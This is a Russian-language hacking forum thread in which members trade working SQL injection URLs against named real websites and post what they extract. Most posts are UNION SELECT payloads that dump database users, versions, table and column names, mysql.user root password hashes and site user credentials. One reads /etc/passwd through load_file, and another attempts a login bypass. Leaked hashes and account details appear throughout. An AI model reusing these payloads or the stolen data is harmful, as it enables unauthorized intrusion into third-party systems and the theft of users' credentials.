SQL Инъекции

Да, это base64.

Можешь подампить базу тут:
_http://mbclan.org/forum/install/upgrade_301.php?step=hello

 

Гы, чёто больше ничего сделать не могу =\

 

Не везёт мне.. Больше ничего сделать не могу.

Та же песня.

root:45ddce093e0d5d85
Вот терь гуд

Вот..

Вот эта скуля меня радует

Хаха ))

Для тех кто знает китайский =\

 

_http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*

 

чуть не правельно постоил....попробуй так)))
http://www.koss.ru/press.php?id=666+union+select+1,concat(USER(),0x3a,VERSION(),0x%203a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*

вот тогда как красиво получиться))))

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/koss-www/classes/article_out.php on line 47

Edited by ice1k:
Склеил твои посты. Впредь не пиши по несколько постов подряд - редактируй пост и добавляй.

 

2Neorin
Непонял малость...
У fjuDao правильно (в отличии от тебя) запрос построен.


И в свете недавней темы:

Code:

http://contaximages.com/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*

Code:

http://www.harphampix.com/v2/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*

 

Научно-исследовательский институт безопасности жизнедеятельности Республики Башкортостан

Code:

http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,2,3,4/*

USER: risla@localhost
DATABASE: risla
VERSION: 4.0.18-nt

Компания Стокмэн

Code:

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,user(),database(),4,version(),6,7/*

USER: kalitka@localhost
DATABASE: kalitka-plitka
VERSION: 5.0.32-Debian_7etch1-log

 

Уря наконец, попался 5 мускул )) можно поупражняться в использовании information_schema )

Code:

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,Table_name,database(),4,version(),6,7+from+information_schema.tables+limit+35,1/*

Получили таблицу ms_user

Попытался терь получить имена столбцов

Code:

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,version(),6,7+from+information_schema.columns+where+table_name='ms_user'+limit+0,1/*

но что-то незаладилось, может чтото делаю неправильно ?

 

Да, что-то у меня тоже не получается вывести имена стобцов

 

2Пчел
Если не знаешь, что сказать, то лучше промолчать.

Code:

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=CHAR(109,115,95,117,115,101,114)+limit+0,1/*

Code:

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(user_login,char(58),user_passwd,char(58),user_email),3,4,5,6,7+from+ms_user/*

Code:

http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(login,char(58),name,char(58),password),3,4,5,6,7+from+ms_access_users/*

 

2kamaz
Я просто этим постом попросил о помощи, но понял что ты имел в виду. Кстати, спасибо что помог разобраться. Что бы не было офтопом:

General Store Publishing House!

Code:

http://www.gsph.com/index.php?ID=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,[U][B]12[/B][/U],13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*&Lang=EN

USER: [email protected]
DATABASE: indelta_gsph
VERSION: 5.0.37-standard-log

 

HTML:

http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,VERSION(),3,USER(),5/*

 

Самые крупные БД когда либо я брал.

Сайт: www.visionlearning.com
Версия: 4.0.26
Колличесвто юзеров: 31001

PHP:

http://www.visionlearning.com/library/flash_viewer.php?oid=-21+union+select+1,concat_ws(char(58),username,password,email),3,4+from+users+limit+31000,31001/*

ice1k: Убрал аптайм.ру. Не забываем посматривать антибоян:
_http://hack-shop.org.ru/sql.php
Ok.


Сайт:www.dotfiles.com
Версия:5.0.38

PHP:

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(name,char(58),email)+from+user--

Хм,странно в information_schema.columns есть password

Но на деле не работет (.

 

2V.I.P
Колонка "password" не работает потому, что в таблице user ее нет. Есть только в таблице user с перфиксом mysql.

Code:

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(user,char(58),password)+from+mysql.user--

И еще в таблице users c различными перфиксами

Code:

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,login,email,password)+from+radiant.users--

Code:

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,login,email,password)+from+radiant_dev.users--

Code:

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,password)+from+rblog.users%20limit%209500,1--

 

не ожидал такое от тебя, репы вроде не мало

 

Code:

http://www.exploro.ro/index.php?module=detalii_excursie&id_get=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

USER: exploro_exploro@localhost
DATABASE: exploro_exploro
VERSION: 4.1.21-standard

 

2}{0TT@БЬ)Ч
ыыы
Только щас заметил...

Раз я тут все равно показываю себя нубом... то может кто-нить обьяснит, почему не получается запрос

Code:

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,  concat(user,char(58),password)+from+mysql-old.user--

Хотя

Code:

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(table_schema,char(46),table_name)+from+information_schema.columns+where+table_name=CHAR(117,115,101,114)--

 

Code:

http://www.id-t.nl/news-subpage.php?newsid=-5449+union+select+1,2,3,4,5,6,7,user,password,user(),11,12,13,14,15,16,17,18+from+mysql.user/*

root:69540c43630a0fad
[email protected]

Code:

http://www.montevideo.nl/en/nieuws/detail.php?id=-108'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database(),0x3a)/*&archief=

- имееться юзеры+пассы

Code:

http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,password,3,username,5+from+users/*

+limit в помощь...

 

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*

mysql.user:

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(user,char(58),password),5,6,7+from+mysql.user+limit+1,1/*

root:1da2058b62d7a119

/etc/passwd:

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7/*

163 таблицы:

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+163,1/*

forum.ibf_members_converge:

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(converge_id,char(58),converge_pass_hash,char(58),converge_pass_salt),5,6,7+from+forum.ibf_members_converge+limit+0,1/*

1:33581792b4c389b0219866f27c29e3b8:~v-nI:::4334925

lipskerov.phpbb_users:

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7+from+lipskerov.phpbb_users+limit+1,1/*

alien:5f58ac9c3b1c0c3ce51d3092816b96ed:::4312034

magr.cms_members:

Колонки:

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns+where+table_name=char(99,109,115,95,109,101,109,98,101,114,115)+limit+0,1/*

Code:

id
status
name
full_name
phone_1
phone_2
phone_3
phone_4
fax
site
email
director_name
director_dolz
login
pass
in_org
sert
licen
full_info

Вывод инфы:

Code:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(id,char(58),name),5,6,7+from+magr.cms_members+limit+0,1/*

 

http://www.proplay.ru/users/login/

Уязвимо поле "пароль" (при ' выдает ошибку мускула). Но пара admin : 1 or 1=1/* не проканала